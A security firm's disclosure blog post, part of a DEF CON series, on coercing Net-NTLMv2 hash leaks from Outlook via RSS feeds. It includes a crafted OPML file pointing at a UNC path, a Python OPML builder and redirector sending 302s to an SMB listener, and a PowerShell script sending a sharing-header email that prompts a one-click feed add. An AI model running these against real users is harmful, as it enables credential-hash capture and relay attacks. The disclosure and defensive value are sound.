PrivSec Consulting

Releases

Remember RSS? NTLM Hash Leak in Outlook

9/18/2024

 
tl;dr
By leveraging the sharing headers in Outlook, as with the CVE bypass we discovered earlier in this series, it was possible to create a one-click Net-NTLMv2 hash leak in Outlook: the user clicks “Add this RSS Feed” and no warning is shown.

Introduction 
This is part four of a five-part blog post series on NTLM-related research that was presented in the DEF CON 32 talk 'NTLM - the last ride'. After hearing that Microsoft plans to kill off NTLM (New Technology LAN Manager) authentication in Windows 11 and later, we decided to speedrun coercing hashes out of a few more things before it fades into obscurity over the next twenty-five years or so.
For more detail about what NTLM is, what you can do with a captured Net-NTLMv2 hash, and why being able to get one out of an application is bad, please see the first blog post in this series (link).

What is RSS? 
If you remember the internet in the mid to late 2000s, you probably remember RSS. If you don’t, RSS (which stands for RDF Site Summary or Really Simple Syndication, depending on who you ask) is a way for a website to publish its updates in a machine-readable format (XML). News sites and blogs publish RSS feeds, and RSS reader programs periodically fetch the feeds and display new items to the user.

RSS in Outlook 
In 2007, at about the time RSS was at its most popular, Microsoft added RSS reader functionality to Outlook. Because Microsoft never removes functionality, Outlook still has this capability today.
RSS feeds can be added in three ways: 
  • By right clicking the RSS Feeds folder and choosing Add a New RSS Feed. 
  • By clicking a link with an RSS `feed:` URI (see the previous post in this series for more fun with URI handlers). 
  • By importing an OPML file. 

The vulnerabilities 
We first poked around with RSS by messing with the OPML file format. OPML, or Outline Processor Markup Language, is yet another XML file format. It can be used to create a list of RSS feeds to subscribe to, which can be useful in cases such as exporting feeds from one reader when switching to another. 
We tried creating a .opml file with the following contents: 

<?xml version="1.0" encoding="UTF-8"?>
<opml version="1.0">
  <head>
    <title>Sample OPML File</title>
  </head>
  <body>
    <outline text="My RSS Feeds">
      <outline text="Tech News" type="rss" xmlUrl="\\\\192.168.178.74\\" />
      <!-- Add more RSS feed outlines as needed -->
    </outline>
  </body>
</opml>

Double-clicking this file opened Outlook and... it didn’t work. But back in part two (link) we learned about redirecting HTTP traffic to SMB. We changed the `xmlUrl` value to point to an HTTP redirector (a web server that answers the feed request with a redirect to a UNC path on our SMB listener) and this time it worked! Outlook followed the redirect, authenticated to the SMB listener, and leaked a Net-NTLMv2 hash.
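
The OPML file and the redirector it needs, as an added example (not code from the original post). It builds the subscription file with an attacker-controlled `xmlUrl`, runs the kind of HTTP redirector described above (every GET is answered with a 302 whose Location is a UNC path), and includes a defensive check that scans an OPML file for feed URLs that are not plain http(s). The listener address `192.0.2.10`, the share name and the redirector host name are assumptions, not values from the post.

```python
# Added example (not code from the original post): build the OPML file described
# above and stand up the kind of HTTP redirector that turned it into a hash leak.
# The listener address, share name and redirector host are placeholders (assumed).
import http.client
import http.server
import threading
import urllib.parse
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Assumed attacker SMB listener (RFC 5737 documentation address). Any SMB
# listener that captures Net-NTLMv2 (a Responder-style tool) would sit here.
UNC_TARGET = r"\\192.0.2.10\share\feed.xml"


def build_opml(feed_name: str, xml_url: str) -> bytes:
    """Return an OPML 1.0 document with a single subscription whose xmlUrl we control."""
    opml = ET.Element("opml", version="1.0")
    head = ET.SubElement(opml, "head")
    ET.SubElement(head, "title").text = "Sample OPML File"
    body = ET.SubElement(opml, "body")
    group = ET.SubElement(body, "outline", text="My RSS Feeds")
    ET.SubElement(group, "outline", text=feed_name, type="rss", xmlUrl=xml_url)
    return ET.tostring(opml, encoding="utf-8", xml_declaration=True)


class Redirector(http.server.BaseHTTPRequestHandler):
    """Answer every GET with a 302 whose Location is a UNC path.

    A fetcher that follows the redirect literally (Outlook's RSS fetcher did)
    opens an SMB connection to the host in the path and authenticates to it,
    handing the listener a Net-NTLMv2 challenge/response to capture.
    """

    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", UNC_TARGET)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo quiet


def probe_redirector() -> Tuple[int, str]:
    """Start the redirector on a loopback ephemeral port, issue one GET with a
    client that does NOT follow redirects, and return (status, Location)."""
    server = http.server.HTTPServer(("127.0.0.1", 0), Redirector)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        conn = http.client.HTTPConnection("127.0.0.1", server.server_address[1], timeout=5)
        conn.request("GET", "/test.xml")
        resp = conn.getresponse()
        result = (resp.status, resp.getheader("Location"))
        conn.close()
    finally:
        server.shutdown()
        server.server_close()
    return result


def suspicious_feed_urls(opml_bytes: bytes) -> List[str]:
    """Defensive check: every xmlUrl that is not a plain http(s) URL (a UNC path,
    a file:// URL, ...), i.e. one that would make a reader talk SMB directly."""
    flagged = []
    for node in ET.fromstring(opml_bytes).iter("outline"):
        url = node.get("xmlUrl")
        if url is None:
            continue
        scheme = urllib.parse.urlsplit(url).scheme.lower()
        if url.startswith("\\\\") or scheme not in ("http", "https"):
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    # Constructed demo: an OPML pointing at a redirector host we would control.
    opml = build_opml("Tech News", "http://redirector.example/test.xml")
    print(opml.decode())
    print("static check flags:", suspicious_feed_urls(opml))
    print("redirector answers:", probe_redirector())
```

Note what the static check does and does not catch: it flags the first attempt (a bare UNC path in `xmlUrl`), but the working variant uses an ordinary http URL and passes cleanly, because the UNC path only appears in the redirector's response. That is why blocking outbound SMB (TCP 445) at the perimeter matters more than inspecting feed files.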
This issue was then disclosed to the MSRC team. 
While waiting for a response, we investigated whether there were any other ways of getting Outlook to leak a hash via RSS. In the previous post we learned about the URI handlers that Outlook supports, which include the `feed:` URI. By combining it with the `x-sharing-config-url:` email header from part two, we can generate an email that prompts the user to add an RSS feed to Outlook. As soon as they click the “Add this RSS Feed” button, Outlook fetches the feed URL and, via the same redirect to SMB, their Net-NTLMv2 hash is leaked. No warning is shown.
 

Fun sidenote: you can include images in CDATA tags once the feed has been imported. 

Reproduction steps 
We provided the following PowerShell script to Microsoft to assist with reproduction:
 

# Create an instance of the Outlook Application (needs Outlook installed and a configured profile)
$outlook = New-Object -ComObject Outlook.Application

# Create a new mail item (0 = olMailItem)
$mail = $outlook.CreateItem(0)

# Set the subject of the email
$mail.Subject = "Sharing Email with Custom Headers"

# Set the recipient (call Recipients.Add once per additional recipient)
$mail.Recipients.Add("[email protected]")

# Set the body of the email
$mail.Body = "This is the body of the email."

# Add custom headers.
# {00020386-0000-0000-C000-000000000046} is the PS_INTERNET_HEADERS property set,
# so named properties created here are sent as transport (SMTP) headers of the message.
$mail.PropertyAccessor.SetProperty("http://schemas.microsoft.com/mapi/string/{00020386-0000-0000-C000-000000000046}/x-sharing-config-url", "feed://privsec.nz/test.xml")
$mail.PropertyAccessor.SetProperty("http://schemas.microsoft.com/mapi/string/{00020386-0000-0000-C000-000000000046}/Content-Class", "Sharing")

# Send the email
$mail.Send()

# Display a confirmation message
Write-Host "Email sent successfully."

 
 
Disclosure timeline
08 May 2024: Reported to MSRC
11 May 2024: Case opened by MSRC
30 May 2024: Accepted as a vulnerability by MSRC, but rated ‘Moderate’, so the case was closed
August 2024: Disclosed at DEF CON 32

Want to know more? Contact us now.

[email protected] | 0800 150 805